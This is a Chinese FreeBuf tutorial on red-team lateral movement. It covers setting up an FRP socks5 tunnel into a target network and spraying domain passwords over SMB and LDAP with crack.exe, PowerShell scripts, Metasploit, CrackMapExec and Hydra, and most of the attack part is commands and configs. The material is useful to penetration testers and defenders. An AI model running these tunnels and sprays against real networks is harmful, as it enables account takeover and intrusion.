freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网渗透之横向移动:从域外对域内进行密码喷洒攻击研究 原创
2021-10-16 11:37:10

密码喷洒攻击属于一种自动化攻击的方式,为了避免只针对一个用户进行密码爆破而造成账户锁定,密码喷洒攻击是对所有用户进行爆破,既避免了用户被锁定,同时也提高了用户破解密码的效率。同时,不同于固定用户名对密码进行爆破,密码喷洒攻击是固定密码对用户名进行爆破。

建立通信隧道

⼀般我们红队⼈员与⽬标内⽹建⽴了 socks5 隧道后,就可以从域外(这⾥指的是红队⼈员的个⼈ PC)对域内机器进⾏信息搜集了,很多⼯具不⽤上传到⽬标机器,也就不易被 AV 检测到,但是有可能会被⼀些流量检测设备发现有⼤量 socks5 流量

使用Proxifier和FRP进行socks5隧道的建立

首先现在攻击机kali建立监听隧道

[common]
bind_port = 7000

然后在目标机也开启frpc,并且连接到kali,同时开启socks5服务

[common]
server_addr = 192.168.137.93    //kali的IP
server_port = 7000

[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5

最后使用攻击机win7,通过proxifier连接socks5

1634221618_61683e3267dc93795902d.png!small?1634221619349

crack 对域内进⾏密码喷洒(找不到下载链接)

crack 是⼀款⾮常好⽤的密码喷洒⼯具,并且速度快,⽀持对⼀个 C、 B 段进⾏基于 smb 密码喷洒。命令语法

基于单个⽤户单个密码喷洒
crack.exe -i 10.10.10.10/24 -p 445 -U redteam\saulgoodman -P Saul!@#45 -s smb -t 100
基于⽤户字典密码字典喷洒
crack.exe -i 10.10.10.10/24 -p 445 -U user.txt -P pass.txt -s smb -t 100

喷洒成功会在当前路径下⽣成⼀个 result.txt ⽂件,⾥⾯就是喷洒成功的结果

Invoke-DomainPasswordSprayOutsideTheDomain(对域内进⾏密码喷洒)

Invoke-DomainPasswordSprayOutsideTheDomain 这个脚本是 3gstudent 写的⼀个脚本。

下载地址: https://github.com/3gstudent/Homework-of-Powershell

使⽤单个密码

powershell -exec bypass
Import-Module .\Invoke-DomainPasswordSprayOutsideTheDomain.ps1
Invoke-DomainPasswordSprayOutsideTheDomain -UserList users.txt -Domain "10.10.10.10/DC=redteam,DC=com" -Password admin!@#45

1634221748_61683eb40906d0cf5fde4.png!small?1634221749081

使⽤密码⽂件

Invoke-DomainPasswordSprayOutsideTheDomain -UserList users.txt -Domain "10.10.10.10/DC=redteam,DC=com" -Password admin!@#45

这⾥建议使⽤单个密码来进⾏密码喷洒,如果是⼀个密码字典的话有可能会报错

使用msf进行密码喷洒

首先要配置代理

setg proxies socks5:192.168.137.54:7777
setg ReverseAllowProxy true

使用模块

scanner/smb/smb_login

可以配置文件字典爆破

set user_file /root/users.txt
set pass_file /root/pass.txt

如果是对域进行爆破要设置域

set smbdomain redteam

如果是对工作组进行爆破

set smbdomain .

然而我这边一直显示无法连接不知道为什么

1634221823_61683effb0f7a5ccb9ff8.png!small?1634221824827

超级弱⼝令⼯具对域内进⾏密码喷洒

超级弱⼝令检查⼯具是⼀款Windows平台的弱⼝令审计⼯具,⽀持批量多线程检查,可快速发现弱密码、弱⼝令账号,密码⽀持和⽤户名结合进⾏检查,⼤⼤提⾼成功率,⽀持⾃定义服务端⼝和字典。 ⼯具采⽤C#开发,需要安装.NET Framework 4.0,⼯具⽬前⽀持SSH、 RDP、 SMB、 MySQL、 SQLServer、 Oracle、 FTP、 MongoDB、Memcached、 PostgreSQL、 Telnet、 SMTP、 SMTP_SSL、 POP3、 POP3_SSL、 IMAP、 IMAP_SSL、 SVN、VNC、 Redis等服务的弱⼝令检查⼯作。

下载地址: https://github.com/shack2/SNETCracker

1634221857_61683f217bdf1d41e4f04.png!small?1634221858639

CrackMapExec 对域内进⾏密码喷洒

CrackMapExec(⼜名 CME)是⼀款⾮常好⽤的密码喷洒攻击的⼯具,在 Kali Linux 默认已经安装好。

下载地址: https://github.com/byt3bl33d3r/CrackMapExec

crackmapexec smb 10.10.10.12 -u users.txt -p 'admin!@#45' --continue-on-success

Hydra 对域内进⾏密码喷洒

Hydra 是最著名的暴⼒破解⼯具之⼀,我将在这⾥针对 SMB 协议,但这款⼯具⼏乎可以使⽤任何其他协议来完成密码喷洒

hydra -L users.txt -p admin!@#45 10.10.10.12 smb

使用DomainPasswordSpray

工具地址:https://github.com/dafthack/DomainPasswordSpray

DomainPasswordSpray 是用 PowerShell 编写的工具,用于对域用户执行密码喷洒攻击。默认情况下,它将利用 LDAP 从域中导出用户列表,然后扣掉被锁定的用户,再用固定密码进行密码喷洒。

先从powershell导入脚本,然后再运行

1634221904_61683f506f7a16277e8b4.png!small?1634221905415

可以看到运行结果1634221912_61683f589f8798b424e24.png!small?1634221913744

当然我们可以以字典的形式进行爆破

Invoke-DomainPasswordSpray -UserList users.txt -Domain g1ts.com -PasswordList passlist.txt -OutFile sprayed-creds.txt

UserList:用户字典

Password:单个密码

PasswordList:密码字典

OutFile:输出的文件名

Domain:要爆破的域

Force:强制喷洒继续,而不提示确认。

本文作者:, 转载请注明来自FreeBuf.COM

# 渗透测试 # web安全 # 内网渗透 # 漏洞分析 # Kerberos协议
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按热度排序

登录/注册后在FreeBuf发布内容哦

相关推荐
\
  • 0 文章数
  • 0 评论数
  • 0 关注者
文章目录
登录 / 注册后在FreeBuf发布内容哦
收入专辑